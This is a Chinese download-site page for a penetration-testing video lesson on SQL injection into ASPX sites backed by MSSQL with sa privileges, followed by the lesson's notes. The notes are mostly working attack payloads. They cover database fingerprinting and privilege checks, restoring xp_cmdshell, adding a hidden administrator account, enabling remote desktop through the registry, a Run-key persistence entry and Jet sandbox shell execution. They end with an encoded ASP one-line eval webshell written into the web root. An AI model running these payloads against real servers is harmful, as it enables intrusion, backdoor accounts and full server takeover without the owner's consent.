您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第六课:aspx+mssql数据库,sa权限注入
实战渗透测试第六课:aspx+mssql数据库,sa权限注入
软件大小:19.0 MB
更新时间:2016-11-01 01:26
授权方式:共享版
人气访问:89次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第六课:aspx+mssql数据库,sa权限注入介绍

讲师:巅峰邪恶

动画名称:渗透测试第六课   aspx+mssql数据库 sa权限注入

测试环境:Win7 系统


and user>0 判断数据库  返回错误为mssql数据库


权限判断


and 1=(select Is_SRVROLEMEMBER('sysadmin'))   //判断是否是系统权限


and 1=(select IS_SRVROLEMEMBER('db_owner'))  //判断是否是库权限


and 1=(select IS_SRVROLEMEMBER('public'))    //public权限


and (select count(*) from sysobjects)>=0   返回正常为mssql数据库


and (select count(*) from msysobjects)>=0  返回正常为access数据库


and exists(select * from sysobjects)   返回正常为mssql注入点


and @@version>0   判断数据库版本


;declare @d int //判断mssql支持多行语句查询


and(select count(1) from [sysobjects])>=0 是否支持子查询


and 1=convert(int,db_name()) 或and 1=(select db_name()) //当前数据库名


and user>0 获得当前数据库用户名


and 1=(select @@servername) //本地服务名


and 1=(select HAS_DBACCESS('master'))  //判断是否有库读取权限



sa权限下执行可执行的操作


//判断xp_cmdshell是否存在

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')  


and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')//查看XP_regread扩展存储过程是不是已经被删除



//删除xp_cmdshell

exec master..sp_dropextendedproc 'xp_cmdshell'


//利用系统中默认的xplog70.dll文件,自动恢复xp_cmdshell

;exec master..sp_addextendedproc xp_cmdshell,'xplog70.dll'



//如恢复不成功,说明被改名或删除,可上传xplog70.dll自定义路径恢复

;exec master..sp_addextendedproc 'xp_cmdshell','c:\xplog70.dll'



sa权限下执行

;exec master..xp_cmdshell '命令'利用 xp_cmdshell 可执命令,例如提交如下查询,可查看服务器 c 盘目录


最常见的利用方法是直接添加管理员账号,利用远程终端进行登录控制

;exec master..xp_cmdshell 'net user cimer cimer123 /add'

;exec master..xp_cmdshell 'net localgroup administrators cimer /add'


开启3389远程连接,并修改连接端口号


;exec master..xp_cmdshell 'sc config termservice start=auto'

;exec master..xp_cmdshell 'net start termservice'

;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;


xp_regwrite操作注册表与开启沙盒模式


操作注册表

;exec master..xp_regwrite 

'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','black','REG

_SZ','net user admin888 cimer123 /add'





上面是写入注册表启动项,系统启动后会执行命令,从而添加一个用户,当服务器重启后,添加账户


开启沙盒模式

;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用 jet.oledb 执行如下 

;select * from 

openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select 

shell("net user cimer cimer123 /add")')



注意,如果注入点的参数是 integer 数字型,就可指定"ias.mdb"数据库;如果是 string

字符型,则可指定 dnary.mdb。如果是 windows 2000 系统,数据库的路径应该指定为

"x:\winnt\system32\ias\ias.mdb"。



利用sp_makewebtash写入一句话木马


;exec sp_makewebtask 

'c:\inetpub\wwwroot\hx1.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%61%64%6D%69%6E%22%29%25%3E'''   url编码为一句话

实战渗透测试第六课:aspx+mssql数据库,sa权限注入下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号